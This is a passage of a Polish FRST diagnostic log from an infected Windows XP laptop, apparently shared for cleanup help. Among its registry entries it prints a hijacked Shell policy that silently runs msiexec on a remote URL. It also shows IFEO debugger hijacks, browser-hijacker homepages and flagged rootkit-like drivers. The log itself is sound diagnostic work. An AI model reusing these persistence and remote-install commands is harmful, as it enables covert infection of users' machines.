Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x86) Wersja: 24-09-2017 Uruchomiony przez admin (administrator) MATRIX (25-09-2017 16:50:06) Uruchomiony z C:\Documents and Settings\admin\Moje dokumenty\Downloads Załadowane profile: admin (Dostępne profile: admin) Platform: Microsoft Windows XP Professional Dodatek Service Pack 3 (X86) Język: Polski Internet Explorer Wersja 8 (Domyślna przeglądarka: "C:\Program Files\Firefox\Firefox.exe" -osint -url "%1") Tryb startu: Normal Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (Elex do Brasil Participações Ltda) C:\Program Files\Elex-tech\YAC\iSafeSvc.exe (Elex do Brasil Participações Ltda) C:\Program Files\Elex-tech\YAC\iSafeSvc2.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe (Elex do Brasil Participações Ltda) C:\Program Files\Elex-tech\YAC\iSafeTray.exe () C:\Program Files\Explorer\iedvutils.exe (Agere Systems) C:\WINDOWS\AGRSMMSG.exe (Microsoft Corporation) C:\WINDOWS\system32\scardsvr.exe (Analog Devices, Inc.) C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe (Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Intel Corporation) C:\WINDOWS\system32\hkcmd.exe ( Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe (Hewlett-Packard Co.) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe (HP) C:\WINDOWS\system32\HPSIsvc.exe () C:\Documents and Settings\All Users\Dane aplikacji\DataCardService\HWDeviceService.exe () C:\Documents and Settings\All Users\Dane aplikacji\MobileBrServ\mbbService.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Sony Corporation) C:\Program Files\Sony\Sony Picture Utility\VolumeWatcher\SPUVolumeWatcher.exe (Mozilla Corporation) C:\Program Files\Firefox\Firefox.exe (Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe (Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe (Mozilla Corporation) C:\Program Files\Firefox\plugin-container.exe ==================== Rejestr (filtrowane) =========================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [AGRSMMSG] => C:\WINDOWS\AGRSMMSG.exe [88363 2004-08-24] (Agere Systems) HKLM\...\Run: [SoundMAXPnP] => C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe [1388544 2004-10-14] (Analog Devices, Inc.) HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [815104 2006-11-14] (Synaptics, Inc.) HKLM\...\Run: [igfxhkcmd] => C:\WINDOWS\system32\hkcmd.exe [84760 2007-06-19] (Intel Corporation) HKLM\...\Run: [QlbCtrl.exe] => C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [177456 2007-10-19] ( Hewlett-Packard Development Company, L.P.) HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM\...\Run: [] => [X] HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2007-03-11] (Hewlett-Packard Co.) HKLM\...\Run: [KernelFaultCheck] => %systemroot%\system32\dumprep 0 -k HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2219184 2011-01-12] (ESET) HKU\S-1-5-21-1202660629-220523388-1801674531-1003\...\Run: [background_fault] => "background_fault\aswRD.exe" "background_fault\bf.dll",background_fault_collector HKU\S-1-5-21-1202660629-220523388-1801674531-1003\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj84F8Y8MdJYOUMdNYU3NWw2FTH3NTq4FdI3FTQLOTzXMF== /q <==== UWAGA HKU\S-1-5-21-1202660629-220523388-1801674531-1003\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-18\...\RunOnce: [nltide_2] => regsvr32 /s /n /i:U shell32 IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {AEB6717E-7E19-11d0-97EE-00C04FD91972} - -> Brak pliku Startup: C:\Documents and Settings\admin\Menu Start\Programy\Autostart\Picture Motion Browser Media Check Tool.lnk [2017-08-06] ShortcutTarget: Picture Motion Browser Media Check Tool.lnk -> C:\Program Files\Sony\Sony Picture Utility\VolumeWatcher\SPUVolumeWatcher.exe (Sony Corporation) Startup: C:\Documents and Settings\admin\Menu Start\Programy\Autostart\RT-Automatyczne aktualizacje.lnk [2017-05-04] ShortcutTarget: RT-Automatyczne aktualizacje.lnk -> C:\ADAKO\VCDS\VCDS.exe (Brak pliku) Startup: C:\Documents and Settings\All Users\Menu Start\Programy\Autostart\BTTray.lnk [2014-11-25] ShortcutTarget: BTTray.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.) ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 192.168.8.1 Tcpip\..\Interfaces\{21C6FFF0-8A77-41FD-AE6C-D90D0943BC87}: [DhcpNameServer] 192.168.8.1 192.168.8.1 Tcpip\..\Interfaces\{F61AEA54-5A22-4267-89C2-064E30CC7078}: [DhcpNameServer] 192.168.8.1 192.168.8.1 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496259798&z=76432b1baecd37781981be5g2z3t7q2ofw3t8m7z1w&from=che0812&uid=ST9402115A_5PV101R8XXXX5PV101R8 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.sweet-page.com/web/?type=ds&ts=1417776110&from=cor&uid=ST9402115A_5PV101R8XXXX5PV101R8&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496259798&z=76432b1baecd37781981be5g2z3t7q2ofw3t8m7z1w&from=che0812&uid=ST9402115A_5PV101R8XXXX5PV101R8 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.sweet-page.com/web/?type=ds&ts=1417776110&from=cor&uid=ST9402115A_5PV101R8XXXX5PV101R8&q={searchTerms} HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\S-1-5-21-1202660629-220523388-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.nuesearch.com/search/?type=ds&ts=1473140444&z=00bc24b8370a9e4f62aa566g0z6mcc5g6z2e6z7z8z&from=wpm0829&uid=ST9402115A_5PV101R8XXXX5PV101R8&q={searchTerms} HKU\S-1-5-21-1202660629-220523388-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1496259798&z=76432b1baecd37781981be5g2z3t7q2ofw3t8m7z1w&from=che0812&uid=ST9402115A_5PV101R8XXXX5PV101R8 HKU\S-1-5-21-1202660629-220523388-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1496259798&z=76432b1baecd37781981be5g2z3t7q2ofw3t8m7z1w&from=che0812&uid=ST9402115A_5PV101R8XXXX5PV101R8 HKU\S-1-5-21-1202660629-220523388-1801674531-1003\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.nuesearch.com/search/?type=ds&ts=1473140444&z=00bc24b8370a9e4f62aa566g0z6mcc5g6z2e6z7z8z&from=wpm0829&uid=ST9402115A_5PV101R8XXXX5PV101R8&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.yoursites123.com/web/?type=ds&ts=1450082315&z=52e650169d636db432fc1f6gezawbebedb2o3c8gcz&from=wpm07173&uid=ST9402115A_5PV101R8XXXX5PV101R8&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.yoursites123.com/web/?type=ds&ts=1450082315&z=52e650169d636db432fc1f6gezawbebedb2o3c8gcz&from=wpm07173&uid=ST9402115A_5PV101R8XXXX5PV101R8&q={searchTerms} SearchScopes: HKU\S-1-5-21-1202660629-220523388-1801674531-1003 -> DefaultScope {06093123-37C7-410E-8702-C9D8B4A53244} URL = hxxps://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-1202660629-220523388-1801674531-1003 -> {06093123-37C7-410E-8702-C9D8B4A53244} URL = hxxps://www.google.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-1202660629-220523388-1801674531-1003 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = FireFox: ======== FF DefaultProfile: tvx5ium0.default FF ProfilePath: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000 [2017-09-25] FF NewTab: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000 -> hxxp://www.nicesearches.com?type=hp&ts=1476210947&from=3a211011&uid=st9402115a_5pv101r8xxxx5pv101r8&z=82d88d8a5b0dbb788a7b725gbz4m0qcoag6e0t0zbb FF DefaultSearchEngine: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000 -> nice FF SearchEngineOrder.1: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000 -> nice FF SelectedSearchEngine: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000 -> nice FF Homepage: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000 -> hxxp://www.nicesearches.com?type=hp&ts=1476210947&from=3a211011&uid=st9402115a_5pv101r8xxxx5pv101r8&z=82d88d8a5b0dbb788a7b725gbz4m0qcoag6e0t0zbb FF Extension: (ADB Helper) - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\Extensions\adbhelper@mozilla.org [2017-09-17] FF Extension: (xRocket Toolbar) - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\Extensions\arthurj8283@gmail.com [2017-05-05] [Brak podpisu cyfrowego] FF Extension: (Valence) - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\Extensions\fxdevtools-adapters@mozilla.org [2017-08-03] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\searchplugins\amisites.xml [2016-11-23] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\searchplugins\luck.xml [2017-05-05] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\searchplugins\mylucky123.xml [2016-10-10] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\searchplugins\nice.xml [2016-10-11] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\searchplugins\ourluckysites.xml [2017-05-31] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\searchplugins\startpageing123.xml [2017-03-31] FF ProfilePath: C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default [2017-09-25] FF NewTab: C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default -> chrome://quick_start/content/index.html FF DefaultSearchEngine: C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default -> yoursites123 FF SelectedSearchEngine: C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default -> yoursites123 FF Homepage: C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default -> hxxp://www.google.com FF Extension: (SimilarWeb) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2016-11-10] [Brak podpisu cyfrowego] FF Extension: (Default NewTab) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\default_newtabff@gmail.com [2016-09-27] [Brak podpisu cyfrowego] FF Extension: (DownThemAll! v3.0b6 Windows 10 FIX) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\dta3noaero@vano.xpi [2016-08-20] FF Extension: (Firefox Hotfix) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\firefox-hotfix@mozilla.org.xpi [2016-09-04] FF Extension: (English (US) Language Pack) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\langpack-en-US@firefox.mozilla.org.xpi [2016-11-10] [Brak podpisu cyfrowego] FF Extension: (YahooToolsProtected ) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\yahooprotected@gmail.com [2016-09-27] [Brak podpisu cyfrowego] FF Extension: (YahooToolsProtected ) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\yahooprotected@gmail.com.xpi [2015-06-25] [Brak podpisu cyfrowego] FF Extension: (DownThemAll!) - C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\Extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi [2016-11-10] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\searchplugins\nuesearch.xml [2016-09-06] FF SearchPlugin: C:\Documents and Settings\admin\Dane aplikacji\Firefox\Firefox\Profiles\tvx5ium0.default\searchplugins\webssearches.xml [2015-12-14] FF HKLM\...\Firefox\Extensions: [defsearchp@gmail.com] - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\tvx5ium0.default\extensions\defsearchp@gmail.com => nie znaleziono FF HKLM\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\tvx5ium0.default\extensions\deskCutv2@gmail.com => nie znaleziono FF HKLM\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension FF Extension: (SmartPrintButton) - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [Brak podpisu cyfrowego] FF HKLM\...\Firefox\Extensions: [default_newtabff@gmail.com] - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\tvx5ium0.default\extensions\default_newtabff@gmail.com => nie znaleziono FF HKLM\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\tvx5ium0.default\extensions\yahooprotected@gmail.com => nie znaleziono FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension FF Extension: (Microsoft .NET Framework Assistant) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2016-09-28] [Brak podpisu cyfrowego] FF HKLM\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Documents and Settings\admin\Dane aplikacji\Mozilla\Firefox\Profiles\764yxvqm.default-1475001254000\extensions\arthurj8283@gmail.com FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird FF Extension: (ESET Smart Security Extension) - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2017-08-05] [Brak podpisu cyfrowego] FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_27_0_0_130.dll [2017-09-15] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation) FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN) FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-08-05] (Adobe Systems Inc.) ==================== Usługi (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe [272384 2017-09-15] (Adobe Systems Incorporated) [Brak podpisu cyfrowego] R2 btwdins; C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe [266295 2007-02-06] (Broadcom Corporation.) [Brak podpisu cyfrowego] S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [33584 2011-01-12] (ESET) R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [810144 2011-01-12] (ESET) S2 glory; C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\glory\glory.dll [689152 2017-06-02] (glory) [Brak podpisu cyfrowego] S3 HP LaserJet Service; C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe [136704 2009-06-24] (HP) [Brak podpisu cyfrowego] R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2007-06-04] (Hewlett-Packard Co.) [Brak podpisu cyfrowego] R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [131072 2007-06-04] (Hewlett-Packard Co.) [Brak podpisu cyfrowego] R3 hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [135168 2006-05-02] (Hewlett-Packard Development Company, L.P.) [Brak podpisu cyfrowego] R2 HWDeviceService.exe; C:\Documents and Settings\All Users\Dane aplikacji\DatacardService\HWDeviceService.exe [271712 2011-03-14] () R2 iedvutils; C:\Program Files\Explorer\iedvutils.exe [64184 2017-01-22] () R2 iSafeService; C:\Program Files\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) <==== UWAGA R2 Kitty; C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\Kitty\Kitty.dll [124928 2017-05-04] () [Brak podpisu cyfrowego] R2 Mobile Broadband HL Service; C:\Documents and Settings\All Users\Dane aplikacji\MobileBrServ\mbbservice.exe [237424 2014-03-31] () [Brak podpisu cyfrowego] R2 Net Driver HPZ12; C:\WINDOWS\system32\HPZinw12.dll [43520 2006-11-08] (Hewlett-Packard) [Brak podpisu cyfrowego] R2 Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.dll [53248 2006-11-08] (Hewlett-Packard) [Brak podpisu cyfrowego] S3 SoundMAX Agent Service (default); C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe [45056 2002-09-20] (Analog Devices, Inc.) [Brak podpisu cyfrowego] R2 WinSAPSvc; C:\Documents and Settings\admin\Dane aplikacji\WinSAPSvc\WinSAP.dll [1887232 2017-06-02] () [Brak podpisu cyfrowego] S2 CSHMDR; C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\CSHMDR\Snare.dll [X] ===================== Sterowniki (filtrowane) ====================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) S3 AMTFLASH; C:\WINDOWS\System32\drivers\AmtFlash.sys [37632 2011-09-07] (AMT-Cartech Ltd.) R3 btaudio; C:\WINDOWS\System32\drivers\btaudio.sys [530861 2007-02-14] (Broadcom Corporation.) R3 BTDriver; C:\WINDOWS\System32\DRIVERS\btport.sys [30459 2007-02-14] (Broadcom Corporation.) R3 BTKRNL; C:\WINDOWS\System32\DRIVERS\btkrnl.sys [868298 2007-02-14] (Broadcom Corporation.) S3 BTWDNDIS; C:\WINDOWS\System32\DRIVERS\btwdndis.sys [149123 2007-02-14] (Broadcom Corporation.) S3 BTWUSB; C:\WINDOWS\System32\Drivers\btwusb.sys [67960 2007-02-14] (Broadcom Corporation.) R2 CommSBEP; C:\WINDOWS\system32\Drivers\CommSBEP.sys [24476 2000-04-27] (Motorola) [Brak podpisu cyfrowego] R2 eamon; C:\WINDOWS\System32\DRIVERS\eamon.sys [141264 2010-12-21] (ESET) R1 ehdrv; C:\WINDOWS\System32\DRIVERS\ehdrv.sys [115008 2010-12-21] (ESET) R1 epfwtdir; C:\WINDOWS\System32\DRIVERS\epfwtdir.sys [94872 2010-12-21] (ESET) R0 giveio; C:\WINDOWS\System32\giveio.sys [5248 1996-04-03] () [Brak podpisu cyfrowego] R3 GTIPCI21; C:\WINDOWS\System32\DRIVERS\gtipci21.sys [97280 2007-05-09] (Texas Instruments) S3 HPZid412; C:\WINDOWS\System32\DRIVERS\HPZid412.sys [49920 2007-03-08] (HP) S3 HPZipr12; C:\WINDOWS\System32\DRIVERS\HPZipr12.sys [16496 2007-03-08] (HP) S3 HPZius12; C:\WINDOWS\System32\DRIVERS\HPZius12.sys [21568 2007-03-08] (HP) S3 hwdatacard; C:\WINDOWS\System32\DRIVERS\ewusbmdm.sys [101376 2008-07-10] (Huawei Technologies Co., Ltd.) [Brak podpisu cyfrowego] R1 iSafeKrnl; C:\Program Files\Elex-tech\YAC\iSafeKrnl.sys [227776 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlKit; C:\Program Files\Elex-tech\YAC\iSafeKrnlKit.sys [97912 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlMon; C:\Program Files\Elex-tech\YAC\iSafeKrnlMon.sys [45032 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA R1 iSafeKrnlR3; C:\Program Files\Elex-tech\YAC\iSafeKrnlR3.sys [73232 2016-05-23] () [Brak podpisu cyfrowego] <==== UWAGA R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [67288 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA R0 PxHelp20; C:\WINDOWS\System32\Drivers\PxHelp20.sys [36624 2006-11-02] (Sonic Solutions) [Brak podpisu cyfrowego] R3 Rasirda; C:\WINDOWS\System32\DRIVERS\rasirda.sys [19584 2001-08-17] (Microsoft Corporation) S3 RT-USB; C:\WINDOWS\System32\drivers\RT-USB.SYS [59464 2010-06-16] (Ross-Tech LLC) R3 SMCIRDA; C:\WINDOWS\System32\DRIVERS\smcirda.sys [46080 2004-06-16] (SMSC) R0 speedfan; C:\WINDOWS\System32\speedfan.sys [24184 2012-12-29] (Almico Software) S3 w29n51; C:\WINDOWS\System32\DRIVERS\w29n51.sys [2209408 2007-03-01] (Intel® Corporation) S3 catchme; \??\C:\DOCUME~1\admin\USTAWI~1\Temp\catchme.sys [X] U2 CertPropSvc; Brak ImagePath U2 CWASRE; Brak ImagePath U1 eabfiltr; Brak ImagePath S3 ewusbnet; system32\DRIVERS\ewusbnet.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA U5 P3; C:\Windows\System32\Drivers\P3.sys [46848 2009-01-30] (Microsoft Corporation) U2 snare; Brak ImagePath ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc - utworzone pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-09-24 13:05 - 2017-09-25 16:50 - 000000000 ____D C:\FRST 2017-09-23 20:42 - 2017-09-23 20:42 - 000000000 ____D C:\Documents and Settings\All Users\Dane aplikacji\Windows Genuine Advantage 2017-09-23 11:45 - 2017-09-23 11:45 - 000000000 ____D C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\ESET 2017-09-03 22:21 - 2017-09-03 22:21 - 000000000 ____D C:\Program Files\Common Files\ODBC ==================== Jeden miesiąc - zmodyfikowane pliki i foldery ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2017-09-25 16:50 - 2014-12-05 12:20 - 000000000 ____D C:\Documents and Settings\admin\Ustawienia lokalne\temp 2017-09-25 16:32 - 2015-09-28 19:34 - 000000930 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2017-09-25 15:48 - 2014-11-24 22:21 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-09-25 15:47 - 2014-11-24 22:21 - 000032474 _____ C:\WINDOWS\SchedLgU.Txt 2017-09-25 15:44 - 2014-11-26 06:53 - 000000222 _____ C:\WINDOWS\Tasks\Powiadomienie o zakończeniu obsługi systemu Microsoft Windows XP — logowanie.job 2017-09-25 15:32 - 2014-11-24 22:25 - 000000188 ___SH C:\Documents and Settings\admin\ntuser.ini 2017-09-25 14:38 - 2001-07-21 20:17 - 000002206 _____ C:\WINDOWS\system32\wpa.dbl 2017-09-23 20:42 - 2014-11-24 22:54 - 000000000 __RHD C:\Documents and Settings\All Users\Dane aplikacji 2017-09-23 19:56 - 2015-12-14 10:41 - 000000000 ____D C:\Program Files\WinZipper 2017-09-23 19:46 - 2014-11-24 22:48 - 000000000 ___HD C:\WINDOWS\inf 2017-09-23 17:54 - 2014-11-26 16:38 - 004195129 _____ C:\WINDOWS\pfirewall.log.old 2017-09-23 12:27 - 2015-12-14 10:41 - 000000000 ____D C:\Documents and Settings\All Users\Menu Start\Programy\WinZipper 2017-09-23 12:25 - 2016-09-06 07:42 - 000000000 ____D C:\Documents and Settings\All Users\Menu Start\Programy\qksee 2017-09-23 12:25 - 2016-08-06 09:42 - 000000000 ____D C:\Program Files\qksee 2017-09-23 12:20 - 2016-08-27 15:59 - 000000000 ____D C:\Program Files\WinSaber 2017-09-23 11:45 - 2014-11-24 22:25 - 000000000 ___HD C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji 2017-09-23 11:41 - 2014-11-24 22:25 - 000000000 ____D C:\Documents and Settings\admin 2017-09-23 11:36 - 2017-05-05 10:54 - 000000000 ____D C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\CSHMDR 2017-09-23 11:36 - 2017-04-05 15:29 - 000000000 ____D C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\clean 2017-09-23 11:36 - 2016-11-23 13:19 - 000000000 ____D C:\Documents and Settings\admin\Dane aplikacji\cgjcf 2017-09-23 11:36 - 2016-11-10 11:28 - 000000000 ____D C:\Program Files\amuleC 2017-09-23 11:35 - 2017-03-15 19:18 - 000000000 ____D C:\Documents and Settings\admin\Dane aplikacji\Kyubey 2017-09-23 11:35 - 2017-02-08 12:35 - 000000000 ____D C:\Program Files\Gub 2017-09-23 11:34 - 1980-01-04 01:07 - 000000000 ____D C:\Program Files\WinArcher 2017-09-23 11:33 - 2017-04-07 15:59 - 000000000 ____D C:\Documents and Settings\admin\Ustawienia lokalne\Dane aplikacji\AMD 2017-09-23 11:29 - 2016-09-07 19:00 - 000000000 ____D C:\Documents and Settings\LocalService\Ustawienia lokalne\Dane aplikacji\ESET 2017-09-15 11:32 - 2014-11-26 07:10 - 000803328 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe 2017-09-15 11:32 - 2014-11-26 07:10 - 000144896 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl 2017-09-15 11:32 - 2014-11-24 22:09 - 000000000 ____D C:\WINDOWS\system32\Macromed 2017-09-03 23:01 - 2014-11-24 22:21 - 000000188 __SHC C:\Documents and 